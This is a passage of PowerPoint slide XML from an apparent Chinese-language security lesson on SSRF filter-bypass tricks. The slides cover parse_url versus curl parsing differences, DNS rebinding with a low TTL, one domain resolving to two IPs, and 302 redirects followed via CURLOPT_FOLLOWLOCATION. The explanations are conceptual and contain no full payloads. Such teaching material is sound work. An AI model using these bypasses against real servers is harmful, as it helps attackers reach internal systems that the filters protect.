        <p:nvPicPr>
          <p:cNvPr id="14" name="图片 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{694ABCC0-8EAD-AD4B-8244-36A8E5C17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553" y="2104556"/>
            <a:ext cx="9324064" cy="4753444"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40662866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SSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-Hans" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>中的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-Hans" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Trick</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SSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>中的</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>trick</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>parse_url</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>curl</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>解析差异）</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{881C1FBB-03D3-3C4C-B073-5AF1FB3B0BB9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="3767" t="8884" r="8634" b="7929"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1219200" y="1838066"/>
            <a:ext cx="9606280" cy="4887406"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="384619918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SSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-Hans" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>中的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-Hans" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Trick</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SSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>中的</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>trick</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>DNS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-Hans" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Rebinding</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en" altLang="zh-Hans" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="图片 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{972E4597-E607-1D4E-AF37-141D6A014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327" y="1838065"/>
            <a:ext cx="7534870" cy="3122817"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="右箭头 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E7820C5A-5175-3E47-B881-45CB8232AFAD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="19962509">
            <a:off x="6025286" y="2894290"/>
            <a:ext cx="1653606" cy="279132"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF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8B00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="文本框 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE40ECC1-0C82-104C-88B7-A83716BF90E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7650851" y="2275366"/>
            <a:ext cx="2280745" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400" b="1"/>
              <a:t>第一次解析</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="右箭头 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4514FBE5-DE4C-EF48-9593-629359D6B4F2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="754717">
            <a:off x="4800455" y="4183456"/>
            <a:ext cx="1653606" cy="279132"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF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8B00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="文本框 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8578F937-BF3B-F14B-8251-A485DEFA95F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6464611" y="4328345"/>
            <a:ext cx="2280745" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400" b="1"/>
              <a:t>第二次解析</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="297220861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SSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-Hans" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>中的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-Hans" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Trick</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SSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>中的</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>trick</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>DNS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-Hans" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Rebinding</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en" altLang="zh-Hans" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{14773A9B-A3B8-D849-8F14-4C94156F5514}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect b="35296"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1177159" y="1582711"/>
            <a:ext cx="9764110" cy="3052352"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F031F8C-556E-F24B-A480-97614CCD33D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1292772" y="4939862"/>
            <a:ext cx="9375228" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2000">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>改小</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2000" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>TTL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2000">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，让第一次解析和第二次解析得到的</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2000" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2000">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>不一样，即可绕过限制</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="95383225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SSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-Hans" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>中的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-Hans" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Trick</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SSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>中的</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>trick</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>DNS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-Hans" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Rebinding</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en" altLang="zh-Hans" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F031F8C-556E-F24B-A480-97614CCD33D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1081252" y="1744717"/>
            <a:ext cx="9375228" cy="430887"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-Hans" sz="2200" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2200"/>
              <a:t>双重绑定绕过</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E98E7DA-EB27-DC44-A684-FB16AE9E06F0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1366345" y="2337611"/>
            <a:ext cx="7000415" cy="1653209"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2000"/>
              <a:t>如果同一个域名绑定了两个</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2000" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2000"/>
              <a:t>，那么</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2000" dirty="0"/>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2000"/>
              <a:t>中的</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-Hans" sz="2000" dirty="0"/>
              <a:t>gethostname</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2000"/>
              <a:t>会随机返回一个。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>但是</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>Curl</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>在访问这种域名的时候，由于绑定的是两个</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en" sz="2000"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>curl</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>会尝试访问每一个</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en" sz="2000"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>最终返回有效的那个</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40357377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SSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-Hans" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>中的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-Hans" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Trick</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SSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>中的</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>trick</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>302</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>跳转</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B601831-8100-6247-95EC-704721E0D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899" y="2157038"/>
            <a:ext cx="4746910" cy="1493783"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="矩形 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{20D4500E-4E26-D343-82C2-D1023A35D577}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1137307" y="4325035"/>
            <a:ext cx="7481176" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AA3731"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>curl_setopt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>($</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7A3E9D"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AB6526"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>CURLOPT_FOLLOWLOCATION</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
